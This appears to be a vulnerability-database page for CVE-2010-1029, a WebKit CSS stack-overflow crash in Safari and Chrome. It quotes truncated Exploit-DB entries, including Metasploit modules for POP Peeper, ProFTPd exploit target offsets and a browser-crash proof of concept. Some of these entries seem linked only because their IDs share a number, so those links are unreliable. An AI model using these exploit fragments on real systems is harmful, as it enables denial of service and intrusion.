CVE-2010-1029
Published 2010-03-19
CVE-2010-1029: Stack consumption vulnerability in the WebCore::CSSSelector function in WebKit, as used in Apple Safari 4.0.4, Apple Safari on iPhone OS and iPhone OS for iPod…
Priority: P430 · medium · 5 · CVSS 2.0
AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 10.38% (95.2th percentile)
Stack consumption vulnerability in the WebCore::CSSSelector function in WebKit, as used in Apple Safari 4.0.4, Apple Safari on iPhone OS and iPhone OS for iPod touch, and Google Chrome 4.0.249, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a STYLE element composed of a large number of *> sequences.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | safari | — | — |
| — | chrome | — | — |
CVSS provenance
nvd · v2.0 · 5.0 MEDIUM · AV:N/AC:L/Au:N/C:N/I:N/A:P
vendor_redhat · 5.0 MEDIUM
GHSA
GHSA-p27p-g844-ppm9: Stack consumption vulnerability in the WebCore::CSSSelector function in WebKit, as used in Apple Safari 4
ghsa_unreviewed·2022-04-23
Red Hat
qt: Stack consumption via specially-crafted CSS STYLE element
vendor_redhat·2010-02-24·CVSS 5.0
No detection rules found.
Exploit-DB
POP Peeper 3.4 - UIDL Buffer Overflow (Metasploit)
exploitdb·2010-11-30
CVE-2009-1029 POP Peeper 3.4 - UIDL Buffer Overflow (Metasploit)
---
##
# $Id: poppeeper_uidl.rb 11180 2010-11-30 20:19:18Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'POP Peeper v3.4 UIDL Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in POP Peeper v3.4.
When a specially crafted UIDL string is sent to a client,
an attacker may be able to execute arbitrary code. This
module is based off of krakowlabs code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 11180 $',
'References' =>
[
[ 'OSVDB', '53559
Exploit-DB
POP Peeper 3.4 - DATE Buffer Overflow (Metasploit)
exploitdb·2010-11-11
CVE-2009-1029 POP Peeper 3.4 - DATE Buffer Overflow (Metasploit)
---
##
# $Id: poppeeper_date.rb 10998 2010-11-11 22:43:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
class Metasploit3 'POP Peeper v3.4 DATE Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in POP Peeper v3.4.
When a specially crafted DATE string is sent to a client,
an attacker may be able to execute arbitrary code. This
module is based off of krakowlabs code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 10998 $',
'References' =>
[
[ 'CVE', '2009-10
Exploit-DB
ProFTPd IAC 1.3.x - Remote Command Execution
exploitdb·2010-11-07
CVE-2010-4221 ProFTPd IAC 1.3.x - Remote Command Execution
---
# Exploit Title: ProFTPD IAC Remote Root Exploit
# Date: 7 November 2010
# Author: Kingcope
#
# E-DB Note: If you have issues with this exploit, alter lines 549, 555 and 563.
use IO::Socket;
$numtargets = 13;
@targets =
(
# Plain Stack Smashing
#Confirmed to work
["FreeBSD 8.1 i386, ProFTPD 1.3.3a Server (binary)",# PLATFORM SPEC
"FreeBSD", # OPERATING SYSTEM
0, # EXPLOIT STYLE
0xbfbfe000, # OFFSET START
0xbfbfff00, # OFFSET END
1029], # ALIGN
#Confirmed to work
["FreeBSD 8.0/7.3/7.2 i386, ProFTPD 1.3.2a/e/c Server (binary)",
"FreeBSD",
0,
0xbfbfe000,
0xbfbfff00,
1021],
# Return into Libc
#Confirmed to work
["Debian GNU/Linux 5.0, ProFTPD 1.3.2e Server (Plesk binary)",
"Linux",
1, # EXPLOIT STYLE
0x0804CCD4, # write(2) offset
8189,
Exploit-DB
iPhone - 'WebCore::CSSSelector()' Remote Crash
exploitdb·2010-02-24
CVE-2010-1029 iPhone - 'WebCore::CSSSelector()' Remote Crash
---
#!/usr/bin/python
#greetz to my blackhatz and baycatz
#iPhone CSS::Selector crash
#this Python script acts as a web server and sends a malformed long string to the CSS tag
#this is a remote crash bug, however an an
Exploit-DB
Apple Safari 4.0.4 / Google Chrome 4.0.249 - CSS style Stack Overflow Denial of Service (PoC)
exploitdb·2010-02-24
CVE-2010-1029 Apple Safari 4.0.4 / Google Chrome 4.0.249 - CSS style Stack Overflow Denial of Service (PoC)
---
Apple Safari 4.0.4 & Google Chrome 4.0.249 CSS style Stack Overflow
DoS/PoC
Thank you
Rad L. Sneak
Tested on WinXP SP3 and Windows 7 64bit Also works on Apple iPhone Safari
Stack Overflow caused by long malformed string inside of
Code will cause Apple Safari to crash throwing a stack overflow
Chrome will throw up the "Aw, Snap!"
Found by Rad L. Sneak using BF3
What's up Sliccc1....Where's my app
cheers to mithcebones
Save the code below as crash.html and open in Safari 4.0.4 or later, or open with Google Chrome 4.0.249 or later
*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>*>
http://lists.opensuse.org/opensuse-security-announce/2011-01/msg00006.html
http://secunia.com/advisories/43068
http://www.exploit-db.com/exploits/11567
http://www.exploit-db.com/exploits/11574
http://www.securityfocus.com/bid/38398
http://www.vupen.com/english/advisories/2011/0212
https://exchange.xforce.ibmcloud.com/vulnerabilities/56524
https://exchange.xforce.ibmcloud.com/vulnerabilities/56527
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14301
2010-03-19
Published